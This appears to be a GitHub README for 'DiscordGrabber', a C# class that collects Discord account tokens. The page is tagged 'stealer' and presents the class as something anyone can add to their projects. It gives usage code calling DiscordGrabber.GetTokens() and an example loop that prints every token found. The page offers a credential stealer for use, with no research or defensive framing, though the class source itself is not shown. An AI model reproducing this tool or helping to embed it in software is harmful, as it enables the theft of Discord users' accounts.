MoistCoder / DiscordGrabber

Private use C# Discord Token grabber class that anyone can easily add to their projects
MIT License
8 stars 0 forks source link
c c-sharp coder csharp dc discord get grabber moist moistcoder sharp stealer token utility

DiscordGrabber

DiscordGrabber is a C# class that makes the collection of Discord Tokens really easy. I use this class for many of my projects.

The Original code is from Nyxonn (C4ndyGrabber).
I modified it for easier private use and implementation.

Usage

Just add the DiscordGrabber.cs file in your Project and call:

DiscordGrabber.GetTokens();

Example

This will output all found tokens in a console window:

foreach (string token in DiscordGrabber.GetTokens()) Console.WriteLine(token);